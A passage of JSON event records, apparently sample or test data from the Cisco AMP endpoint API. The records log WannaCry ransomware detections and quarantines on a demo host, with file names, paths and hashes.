Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
